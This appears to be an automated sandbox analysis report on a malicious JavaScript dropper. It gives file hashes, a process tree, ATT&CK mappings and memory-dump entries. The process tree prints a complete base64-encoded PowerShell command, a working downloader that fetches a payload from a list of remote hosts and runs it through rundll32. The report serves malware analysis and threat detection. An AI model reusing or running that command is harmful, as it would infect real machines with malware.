0489b7671cbd423e7efd84bedded72481d8314cce7d639a70f8f0afdcb44ae42

General

Target

dashierDemidoct.js
Size

298KB
MD5

b76c3c76361cce4cb135a2772c366553
SHA1

dfa0ea2e368679ccfa1f4da2655c815bf6ef3749
SHA256

0489b7671cbd423e7efd84bedded72481d8314cce7d639a70f8f0afdcb44ae42
SHA512

631dc8bf3dd609743693a2f0ec290b76653a9e7d5d72eb4813b275d3959f92cb784fe63f5dec46b716ca7ee5b48550c2199b66b1afa112c7f6b79ff2713ffb29
SSDEEP

3072:vsa5dsTMUpjWHj2giYSjuDoIGZCypLEEVYqw6uSeyPzQAUNT:vxdmpo2gisDoP08EL6HeyPzQAS

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
520	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	520	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 1372	1500	wscript.exe	27
PID 1500 wrote to memory of 1372	1500	wscript.exe	27
PID 1500 wrote to memory of 1372	1500	wscript.exe	27
PID 1372 wrote to memory of 520	1372	wscript.exe	28
PID 1372 wrote to memory of 520	1372	wscript.exe	28
PID 1372 wrote to memory of 520	1372	wscript.exe	28

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\dashierDemidoct.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\ProgramData\contamMidstout.js" SnaggleteethUngravely Disintoxicate thiazideCedarbird Troland
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1372
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABjAGUAcgBhAHUAbgBvAHMAYwBvAHAAZQBQAGEAcgBpAGUAdABvAGYAcgBvAG4AdABhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAEUAQQBPAFEAQQB1AEEARABFAEEATgBBAEEAMABBAEMANABBAE4AQQBBAHkAQQBDADQAQQBNAFEAQQB6AEEARABrAEEAIgA7ACQAdAByAGEAbgBzAGYAbwByAG0AaQBuAGcAbAB5AEYAbwBzAHQAZQByAGEAYgBsAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFUAQQBMAGcAQQB4AEEARABrAEEATgB3AEEAdQBBAEQARQBBAE4AdwBBADUAQQBDADQAQQBOAEEAQQA1AEEAQQA9AD0APQByAHUAZABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFAAQQBIAGcAQQBlAFEAQgBoAEEARwBNAEEAWQBRAEIAdQBBAEgAUQBBAGEAQQBCAHAAQQBHADQAQQBaAFEAQgBYAEEARwA4AEEAYwBnAEIAawBBAEgAQQBBAFoAUQBCAHkAQQBHAFkAQQBaAFEAQgBqAEEASABRAEEATABnAEIAcwBBAEcAawBBAD0AcgB1AGQAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgAxAEEARwA0AEEAYgB3AEIAeQBBAEcAYwBBAFkAUQBCAHUAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEMANABBAGMAdwBCAGwAQQBBAD0APQAiADsAJABBAG0AYQB6AG8AbgBzAHQAbwBuAGUAUABpAGEAbgBlAHQAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE8AQQBBADAAQQBDADQAQQBNAFEAQQA0AEEARABJAEEATABnAEEAeQBBAEQAVQBBAE0AUQBBAD0AZQBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAFoAUQBCAHcAQQBIAFEAQQBiAHcAQgB6AEEASABRAEEAYwBnAEIAaABBAEcATQBBAGIAdwBCADEAQQBIAE0AQQBVAHcAQgAxAEEARwBJAEEAWQBRAEIAeABBAEgAVQBBAFoAUQBCAGgAQQBHADQAQQBMAGcAQgBuAEEASABJAEEAYgB3AEIAMQBBAEgAQQBBAGUAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABVAEEATQBRAEEAdQBBAEQAUQBBAE4AQQBBAHUAQQBEAFUAQQBPAEEAQQA9ACIAOwAkAFMAYwBhAGIAcgBvAHUAcwBuAGUAcwBzAFcAYQBzAGgAaQBuAGcAdABvAG4AaQBhAG4AYQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQAQQBBAE4AUQBBAHUAQQBEAEUAQQBOAEEAQQAzAEEAQwA0AEEATQBRAEEAeQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAFEAQQB2AEEARwBjAEEAWQBRAEIAMwBBAEMAOABBAFoAdwBCAE8AQQBGAE0AQQBkAFEAQQA9AFAAbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADAAQQBEAEUAQQBMAGcAQQB4AEEARABVAEEATgBRAEEAdQBBAEQAYwBBAE8AQQBBAHUAQQBEAEkAQQBNAFEAQQAwAEEAQwA4AEEAUwBnAEIAUABBAEMAOABBAFQAdwBCAEMAQQBBAD0APQBQAG4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABVAEEATgBBAEEAdQBBAEQARQBBAE4AZwBBADUAQQBDADQAQQBPAEEAQQAxAEEAQwA0AEEATQBnAEEAMQBBAEQAQQBBAEwAdwBBADEAQQBFAFkAQQBiAGcAQgBaAEEAQwA4AEEATQBRAEIATgBBAEQATQBBAFQAdwBBAD0AUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE0AUQBBAHcAQQBEAFEAQQBMAHcAQgBVAEEARQB3AEEAUgB3AEIAbwBBAEUANABBAFoAQQBBAHYAQQBIAGsAQQBkAFEAQgBaAEEARQBRAEEAYgBBAEIATABBAEcASQBBAFMAQQBCAHEAQQBEAEkAQQBRAHcAQgA1AEEAQQA9AD0AUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAUQBBAE8AUQBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAMQBBAEQAawBBAEwAZwBBADUAQQBEAGcAQQBMAHcAQgBRAEEASABBAEEAVgBRAEIAWgBBAEYAZwBBAEwAdwBCADIAQQBHAGMAQQBWAEEAQgAyAEEARQBrAEEAUABuAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAawBBAE0AZwBBAHUAQQBEAEUAQQBNAGcAQQB4AEEAQwA0AEEATQBnAEEAegBBAEMANABBAE4AZwBBAHgAQQBDADgAQQBPAFEAQgBoAEEARABZAEEATgB3AEIAdwBBAEcAVQBBAGMAdwBBAHYAQQBFAEkAQQBjAFEAQgBpAEEASABRAEEAUgBBAEIASABBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAGIAaQBiAGwAaQBvAGsAbABlAHAAdABvAG0AYQBuAGkAYQBjACAAaQBuACAAJABTAGMAYQBiAHIAbwB1AHMAbgBlAHMAcwBXAGEAcwBoAGkAbgBnAHQAbwBuAGkAYQBuAGEAIAAtAHMAcABsAGkAdAAgACIAUABuACIAKQAgAHsAdAByAHkAIAB7ACQASQBtAGIAYQBsAG0AIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADgAQQBkAFEAQgAwAEEARwBnAEEAZABRAEIAdABBAEcAOABBAGMAZwBCAHoAQQBDADQAQQBkAHcAQgB6AEEAQQA9AD0AcgBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE4AUQBBAHUAQQBEAEkAQQBNAEEAQQAxAEEAQwA0AEEATQBnAEEAegBBAEQAUQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQA9AHIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBOAHcAQQB3AEEAQwA0AEEATQBRAEEAegBBAEQAQQBBAEwAZwBBADIAQQBEAEEAQQBMAGcAQQB4AEEARABVAEEATgBnAEEAPQByAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEASABJAEEAWQB3AEIAbwBBAEcAWQBBAGEAUQBCAGwAQQBHADQAQQBaAEEAQgBJAEEARwA4AEEAYgBBAEIAdgBBAEcAMABBAFkAUQBCAHoAQQBIAFEAQQBhAFEAQgBuAEEARwA4AEEAZABBAEIAbABBAEMANABBAFoAZwBCAHMAQQBHADgAQQBjAGcAQgBwAEEASABNAEEAZABBAEEAPQAiADsAJABVAG4AZwBlAG4AaQBhAGwAaQB0AHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgB6AEEASABBAEEAZABRAEIAeQBBAEcANABBAFoAUQBCAGsAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAZABnAEIAdgBBAEcATQBBAFkAUQBCAHMAQQBHAGsAQQBZAHcAQgBoAEEARwB3AEEAYgBBAEIANQBBAEMANABBAGIAZwBCADEAQQBBAD0APQBFAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAZwBBAE4AQQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABFAEEATgBRAEEAMgBBAEMANABBAE0AUQBBADIAQQBEAFkAQQAiADsAJABSAGUAYwBvAHAAeQBpAG4AZwBSAG8AYQBkAHMAdABlAHIAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGkAYgBsAGkAbwBrAGwAZQBwAHQAbwBtAGEAbgBpAGEAYwApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAFIAZQBjAG8AcAB5AGkAbgBnAFIAbwBhAGQAcwB0AGUAcgBzACAALQBPACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBkAGUAcgB1AHMAZQBkAFQAbwByAG4AYQByAGkAYQBuAC4ASQBuAGMAbwBuAHQAcgBvAGwAbABhAGIAbABlADsAJABjAHkAYwBsAG8AbgBvAGwAbwBnAGkAcwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABJAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHcAQQBDADQAQQBPAEEAQQA1AEEAQwA0AEEATQBRAEEAegBBAEQATQBBACIAOwAkAEIAZQBzAHQAYQBuAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEYAQQBIAFkAQQBhAFEAQgBqAEEASABRAEEAYQBRAEIAdQBBAEcAYwBBAEwAZwBCAHkAQQBHADgAQQBaAEEAQgBsAEEARwA4AEEASwBMAEcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATgBnAEEAdQBBAEQAWQBBAE4AUQBBAHUAQQBEAFkAQQBOAGcAQQB1AEEARABJAEEATgBBAEEAeQBBAEEAPQA9ACIAOwBpAGYAIAAoACgARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFUAbgBkAGUAcgB1AHMAZQBkAFQAbwByAG4AYQByAGkAYQBuAC4ASQBuAGMAbwBuAHQAcgBvAGwAbABhAGIAbABlACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAAMgAxADkANQAwADgAKQB7AHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAbgBjAG8AZABlAGQAYwBvAG0AbQBhAG4AZAAgACIAYwB3AEIAMABBAEcARQBBAGMAZwBCADAAQQBDAEEAQQBjAGcAQgAxAEEARwA0AEEAWgBBAEIAcwBBAEcAdwBBAE0AdwBBAHkAQQBDAEEAQQBKAEEAQgBsAEEARwA0AEEAZABnAEEANgBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEAUgBBAEIAaABBAEgAUQBBAFkAUQBCAGMAQQBGAFUAQQBiAGcAQgBrAEEARwBVAEEAYwBnAEIAMQBBAEgATQBBAFoAUQBCAGsAQQBGAFEAQQBiAHcAQgB5AEEARwA0AEEAWQBRAEIAeQBBAEcAawBBAFkAUQBCAHUAQQBDADQAQQBTAFEAQgB1AEEARwBNAEEAYgB3AEIAdQBBAEgAUQBBAGMAZwBCAHYAQQBHAHcAQQBiAEEAQgBoAEEARwBJAEEAYgBBAEIAbABBAEMAdwBBAFkAZwBCAHAAQQBHADQAQQBaAEEAQQA3AEEAQQA9AD0AIgA7ACQAYwBlAHIAYQB0AG8AbQBhAG4AZABpAGIAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcAVQBBAGMAQQBCAGwAQQBIAFEAQQBhAFEAQgAwAEEARwBrAEEAYgB3AEIAMQBBAEgATQBBAEwAZwBCADQAQQBIAGcAQQBlAEEAQQA9AE8AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAGsAQQBHAFUAQQBjAEEAQgBzAEEARwA4AEEAZQBRAEIATQBBAEcARQBBAFoAQQBCADUAQQBHAEkAQQBhAFEAQgB5AEEARwBRAEEATABnAEIAegBBAEcAOABBAGUAUQBBAD0ATwBxAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQATQBBAE0AUQBBAHUAQQBEAEUAQQBNAHcAQQB3AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQA9AE8AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAFEAQQBkAFEAQgBpAEEARwBJAEEAWQBRAEIAcwBBAEUAOABBAFkAZwBCADIAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAFkAdwBCAHYAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAfQB9AA=="
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\contamMidstout.js

Filesize
298KB

MD5
b76c3c76361cce4cb135a2772c366553

SHA1
dfa0ea2e368679ccfa1f4da2655c815bf6ef3749

SHA256
0489b7671cbd423e7efd84bedded72481d8314cce7d639a70f8f0afdcb44ae42

SHA512
631dc8bf3dd609743693a2f0ec290b76653a9e7d5d72eb4813b275d3959f92cb784fe63f5dec46b716ca7ee5b48550c2199b66b1afa112c7f6b79ff2713ffb29

Download Submit
memory/520-60-0x000000001B1F0000-0x000000001B4D2000-memory.dmp

Filesize
2.9MB

Download
memory/520-61-0x0000000002040000-0x0000000002048000-memory.dmp

Filesize
32KB

Download
memory/520-62-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-63-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-64-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-65-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-66-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-67-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download
memory/520-68-0x00000000027E0000-0x0000000002860000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing